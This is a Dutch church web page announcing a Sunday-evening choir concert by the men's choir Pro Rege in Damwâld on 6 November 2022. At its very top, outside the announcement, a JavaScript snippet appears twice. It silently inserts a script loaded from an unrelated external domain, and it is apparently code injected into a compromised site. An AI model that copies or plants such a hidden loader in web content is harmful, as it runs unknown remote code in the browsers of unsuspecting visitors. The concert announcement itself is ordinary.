;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zondagavondzang - PKN Damwâld
6 november 2022
19:30 t/m 22:00
de Ontmoeting
Zondagavondzang

Het is al weer ruim drie jaar geleden dat Zondagavondzang,  het muzikaal evenement met koren uit de regio, heeft plaatsgevonden. Door corona hebben we meerdere keren dit evenement moeten schrappen. Gelukkig hebben we met behulp van de livestream verbinding wél concerten kunnen organiseren. November 2020 hebben we een prachtige avond bij u mogen brengen met orgel en zang door Jochem Schuurman en Tetsje van de Kooi. Het concert werd live gevolgd door ruim 300 bezoekers en is uiteindelijk maar liefst 2000 keer bekeken! In oktober 2021 hebben we met een kleine groep bezoekers èn de livestream verbinding genoten van een concert van orgel en saxofoon, door Harm Hoeve en Marlon Valk.

We zijn blij dat we weer een Zondagavondzang kunnen organiseren en u kunnen vertellen dat we een prachtig koor daarvoor hebben uitgenodigd: mannenkoor Pro Rege uit Dokkum! Het maar liefst 80 personen tellende koor komt op zondagavond 6 november naar de Ontmoeting om voor u te zingen. Het belooft een prachtige avond te worden, dus noteer de datum alvast in uw agenda! Deze avond begint om 19.30 uur.

Van de muziekcommissie.

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld